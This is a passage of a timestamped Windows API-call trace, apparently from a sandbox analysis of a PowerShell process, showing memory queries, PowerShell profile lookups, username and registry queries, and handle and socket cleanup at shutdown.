__alignment2=0x0)) returned 0x30 [0066.072] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.072] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.072] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.073] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.073] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.073] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.127] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.270] VirtualQuery (in: lpAddress=0x24bc60, lpBuffer=0x24cb20, dwLength=0x30 | out: lpBuffer=0x24cb20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.274] VirtualQuery (in: lpAddress=0x24bc60, lpBuffer=0x24cb20, dwLength=0x30 | out: lpBuffer=0x24cb20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.274] VirtualQuery (in: lpAddress=0x24b4b0, lpBuffer=0x24c370, dwLength=0x30 | out: lpBuffer=0x24c370*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.274] VirtualQuery (in: lpAddress=0x24b4b0, lpBuffer=0x24c370, dwLength=0x30 | out: lpBuffer=0x24c370*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.276] CoTaskMemFree (pv=0x1b992d50) [0066.276] RegCloseKey (hKey=0x390) returned 0x0 [0066.276] CoTaskMemFree (pv=0x1b992d50) [0066.276] RegCloseKey (hKey=0x390) returned 0x0 [0066.276] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b9681f0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0066.276] CoTaskMemFree (pv=0x1b9681f0) [0066.276] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x24d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0066.277] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b9681f0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0066.277] CoTaskMemFree (pv=0x1b9681f0) [0066.277] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x24d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0066.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0066.278] SetErrorMode (uMode=0x1) returned 0x1 [0066.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24da20 | out: lpFileInformation=0x24da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0066.278] SetErrorMode (uMode=0x1) returned 0x1 [0066.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0066.281] SetErrorMode (uMode=0x1) returned 0x1 [0066.281] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24da20 | out: lpFileInformation=0x24da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0066.282] SetErrorMode (uMode=0x1) returned 0x1 [0066.282] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39 [0066.282] SetErrorMode (uMode=0x1) returned 0x1 [0066.282] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24da20 | out: lpFileInformation=0x24da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0066.282] SetErrorMode (uMode=0x1) returned 0x1 [0066.282] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e [0066.282] SetErrorMode (uMode=0x1) returned 0x1 [0066.282] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24da20 | out: lpFileInformation=0x24da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0066.282] SetErrorMode (uMode=0x1) returned 0x1 [0066.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.283] CoTaskMemFree (pv=0x1b96d620) [0066.283] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.283] CoTaskMemFree (pv=0x1b96d620) [0066.284] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.284] CoTaskMemFree (pv=0x1b96d620) [0066.285] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.285] CoTaskMemFree (pv=0x1b96d620) [0066.484] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.484] CoTaskMemFree (pv=0x1b96d620) [0066.485] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.485] CoTaskMemFree (pv=0x1b96d620) [0066.487] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0066.487] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24dc00 | out: lpMode=0x24dc00) returned 1 [0066.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.489] SetEvent (hEvent=0x308) returned 1 [0066.489] SetEvent (hEvent=0x390) returned 1 [0066.489] SetEvent (hEvent=0x394) returned 1 [0066.489] SetEvent (hEvent=0x304) returned 1 [0066.490] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.306] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6b8 [0084.306] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x780 [0084.306] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x77c [0084.306] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x744 [0084.306] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x740 [0084.307] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x738 [0084.307] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x748 [0084.307] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x750 [0084.307] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x79c [0084.307] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x764 [0084.307] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7ac [0084.307] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b0 [0084.307] SetEvent (hEvent=0x744) returned 1 [0084.307] SetEvent (hEvent=0x6b8) returned 1 [0084.307] SetEvent (hEvent=0x780) returned 1 [0084.307] SetEvent (hEvent=0x77c) returned 1 [0084.307] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b4 [0084.308] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d9e8 | out: phkResult=0x24d9e8*=0x7bc) returned 0x0 [0084.308] RegQueryValueExW (in: hKey=0x7bc, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24d96c, lpData=0x0, lpcbData=0x24d968*=0x0 | out: lpType=0x24d96c*=0x0, lpData=0x0, lpcbData=0x24d968*=0x0) returned 0x2 [0084.672] SetEvent (hEvent=0x740) returned 1 [0084.672] SetEvent (hEvent=0x738) returned 1 [0084.672] SetEvent (hEvent=0x748) returned 1 [0084.920] CoTaskMemAlloc (cb=0x104) returned 0x1b96ee90 [0084.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96ee90, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.920] CoTaskMemFree (pv=0x1b96ee90) [0085.015] SetEvent (hEvent=0x31c) returned 1 [0085.016] CoTaskMemAlloc (cb=0x804) returned 0x1cf851f0 [0085.016] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1cf851f0, nSize=0x24da88 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24da88) returned 0x1 [0085.016] CoTaskMemFree (pv=0x1cf851f0) [0085.016] CoTaskMemAlloc (cb=0x204) returned 0xe8b20 [0085.016] GetUserNameW (in: lpBuffer=0xe8b20, pcbBuffer=0x24dac8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24dac8) returned 1 [0085.016] CoTaskMemFree (pv=0xe8b20) [0085.017] ReportEventW (hEventLog=0x1ba60008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x318f2b0*="Stopped", lpRawData=0x318f040) returned 1 [0085.061] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0085.063] CoGetContextToken (in: pToken=0x24f650 | out: pToken=0x24f650) returned 0x0 [0085.063] CObjectContext::QueryInterface () returned 0x0 [0085.063] CObjectContext::GetCurrentThreadType () returned 0x0 [0085.063] Release () returned 0x0 [0085.064] CoGetContextToken (in: pToken=0x24f220 | out: pToken=0x24f220) returned 0x0 [0085.064] CObjectContext::QueryInterface () returned 0x0 [0085.064] CObjectContext::GetCurrentThreadType () returned 0x0 [0085.064] Release () returned 0x0 [0085.065] CoGetContextToken (in: pToken=0x24f220 | out: pToken=0x24f220) returned 0x0 [0085.065] CObjectContext::QueryInterface () returned 0x0 [0085.070] CObjectContext::GetCurrentThreadType () returned 0x0 [0085.070] Release () returned 0x0 [0085.074] CoGetContextToken (in: pToken=0x24f220 | out: pToken=0x24f220) returned 0x0 [0085.074] CObjectContext::QueryInterface () returned 0x0 [0085.074] CObjectContext::GetCurrentThreadType () returned 0x0 [0085.074] Release () returned 0x0 [0085.114] CoGetContextToken (in: pToken=0x24f210 | out: pToken=0x24f210) returned 0x0 [0085.114] CObjectContext::QueryInterface () returned 0x0 [0085.114] CObjectContext::GetCurrentThreadType () returned 0x0 [0085.114] Release () returned 0x0 [0085.115] CoUninitialize () Thread: id = 28 os_tid = 0xae0 Thread: id = 29 os_tid = 0xae4 Thread: id = 30 os_tid = 0xae8 Thread: id = 31 os_tid = 0xaec Thread: id = 32 os_tid = 0xaf0 Thread: id = 33 os_tid = 0xaf4 [0053.807] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0061.678] LocalFree (hMem=0xb3af0) returned 0x0 [0061.678] CloseHandle (hObject=0x320) returned 1 [0061.678] CloseHandle (hObject=0x13) returned 1 [0061.679] CloseHandle (hObject=0xf) returned 1 [0061.679] RegCloseKey (hKey=0x30c) returned 0x0 [0061.679] RegCloseKey (hKey=0x308) returned 0x0 [0061.679] RegCloseKey (hKey=0x304) returned 0x0 [0061.680] LocalFree (hMem=0xb3ac0) returned 0x0 [0061.680] RegCloseKey (hKey=0x32c) returned 0x0 [0062.717] RegCloseKey (hKey=0x304) returned 0x0 [0064.387] RegCloseKey (hKey=0x3a4) returned 0x0 [0064.387] RegCloseKey (hKey=0x388) returned 0x0 [0064.387] RegCloseKey (hKey=0x384) returned 0x0 [0064.387] RegCloseKey (hKey=0x380) returned 0x0 [0064.388] RegCloseKey (hKey=0x37c) returned 0x0 [0064.388] RegCloseKey (hKey=0x378) returned 0x0 [0064.388] RegCloseKey (hKey=0x374) returned 0x0 [0064.388] RegCloseKey (hKey=0x350) returned 0x0 [0064.389] RegCloseKey (hKey=0x3a0) returned 0x0 [0064.389] RegCloseKey (hKey=0x36c) returned 0x0 [0064.389] RegCloseKey (hKey=0x368) returned 0x0 [0064.389] RegCloseKey (hKey=0x364) returned 0x0 [0064.390] RegCloseKey (hKey=0x360) returned 0x0 [0064.390] RegCloseKey (hKey=0x35c) returned 0x0 [0064.390] RegCloseKey (hKey=0x358) returned 0x0 [0064.390] RegCloseKey (hKey=0x354) returned 0x0 [0064.391] RegCloseKey (hKey=0x39c) returned 0x0 [0064.391] RegCloseKey (hKey=0x398) returned 0x0 [0064.391] RegCloseKey (hKey=0x344) returned 0x0 [0064.391] RegCloseKey (hKey=0x340) returned 0x0 [0064.392] RegCloseKey (hKey=0x33c) returned 0x0 [0064.392] RegCloseKey (hKey=0x338) returned 0x0 [0064.392] RegCloseKey (hKey=0x334) returned 0x0 [0064.392] RegCloseKey (hKey=0x330) returned 0x0 [0064.393] RegCloseKey (hKey=0x320) returned 0x0 [0064.393] RegCloseKey (hKey=0x308) returned 0x0 [0064.393] RegCloseKey (hKey=0x304) returned 0x0 [0064.393] RegCloseKey (hKey=0x394) returned 0x0 [0064.393] RegCloseKey (hKey=0x390) returned 0x0 [0064.394] RegCloseKey (hKey=0x370) returned 0x0 [0068.909] RegCloseKey (hKey=0x354) returned 0x0 [0085.066] LocalFree (hMem=0x1b96d510) returned 0x0 [0085.066] LocalFree (hMem=0x1b96d400) returned 0x0 [0085.067] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x318f668, cbSid=0x1b5aec50 | out: pSid=0x318f668*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b5aec50) returned 1 [0085.067] CreateMutexW (lpMutexAttributes=0x318f820, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e4 [0085.067] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1f4) returned 0x0 [0085.068] ReleaseMutex (hMutex=0x3e4) returned 1 [0085.068] CloseHandle (hObject=0x3e4) returned 1 [0085.068] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x318fb78, cbSid=0x1b5aec50 | out: pSid=0x318fb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b5aec50) returned 1 [0085.068] CreateMutexW (lpMutexAttributes=0x318fd30, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e4 [0085.068] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1f4) returned 0x0 [0085.068] ReleaseMutex (hMutex=0x3e4) returned 1 [0085.068] CloseHandle (hObject=0x3e4) returned 1 [0085.068] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3190088, cbSid=0x1b5aec50 | out: pSid=0x3190088*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b5aec50) returned 1 [0085.068] CreateMutexW (lpMutexAttributes=0x3190240, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e4 [0085.068] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1f4) returned 0x0 [0085.068] ReleaseMutex (hMutex=0x3e4) returned 1 [0085.068] CloseHandle (hObject=0x3e4) returned 1 [0085.069] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3190598, cbSid=0x1b5aec50 | out: pSid=0x3190598*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b5aec50) returned 1 [0085.069] CreateMutexW (lpMutexAttributes=0x3190750, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e4 [0085.069] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1f4) returned 0x0 [0085.069] ReleaseMutex (hMutex=0x3e4) returned 1 [0085.069] CloseHandle (hObject=0x3e4) returned 1 [0085.069] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3190aa8, cbSid=0x1b5aec80 | out: pSid=0x3190aa8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b5aec80) returned 1 [0085.069] CreateMutexW (lpMutexAttributes=0x3190c60, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e4 [0085.069] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1f4) returned 0x0 [0085.069] ReleaseMutex (hMutex=0x3e4) returned 1 [0085.069] CloseHandle (hObject=0x3e4) returned 1 [0085.074] DeregisterEventSource (hEventLog=0x1ba60008) returned 1 [0085.082] setsockopt (s=0x4d8, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0085.082] closesocket (s=0x4d8) returned 0 [0085.087] UnmapViewOfFile (lpBaseAddress=0x29d0000) returned 1 [0085.088] CloseHandle (hObject=0x414) returned 1 [0085.088] CloseHandle (hObject=0x40c) returned 1 [0085.088] CloseHandle (hObject=0x408) returned 1 [0085.089] CloseHandle (hObject=0x3b8) returned 1 [0085.089] CloseHandle (hObject=0x3b4) returned 1 [0085.089] CloseHandle (hObject=0x3b0) returned 1 [0085.090] CloseHandle (hObject=0x3ac) returned 1 [0085.090] CloseHandle (hObject=0x38c) returned 1 [0085.090] RegCloseKey (hKey=0x7bc) returned 0x0 [0085.090] CloseHandle (hObject=0x388) returned 1 [0085.091] CloseHandle (hObject=0x384) returned 1 [0085.091] CloseHandle (hObject=0x380) returned 1 [0085.091] CloseHandle (hObject=0x37c) returned 1 [0085.092] CloseHandle (hObject=0x378) returned 1 [0085.092] CloseHandle (hObject=0x350) returned 1 [0085.092] CloseHandle (hObject=0x374) returned 1 [0085.092] CloseHandle (hObject=0x7b4) returned 1 [0085.093] CloseHandle (hObject=0x354) returned 1 [0085.093] CloseHandle (hObject=0x7b0) returned 1 [0085.093] CloseHandle (hObject=0x7ac) returned 1 [0085.093] CloseHandle (hObject=0x764) returned 1 [0085.094] CertFreeCRLContext (pCrlContext=0x1b9971b0) returned 1 [0085.094] CertCloseStore (hCertStore=0xd4400, dwFlags=0x0) returned 1 [0085.094] CertFreeCRLContext (pCrlContext=0x1b9971b0) returned 1 [0085.095] FreeCredentialsHandle (phCredential=0x1b5ae0e0) returned 0x0 [0085.101] DeleteSecurityContext (phContext=0x1b5ae9b0) returned 0x0 [0085.102] CloseHandle (hObject=0x4dc) returned 1 [0085.102] CloseHandle (hObject=0x79c) returned 1 [0085.102] CloseHandle (hObject=0x750) returned 1 [0085.102] CloseHandle (hObject=0x748) returned 1 [0085.102] CloseHandle (hObject=0x738) returned 1 [0085.103] CloseHandle (hObject=0x740) returned 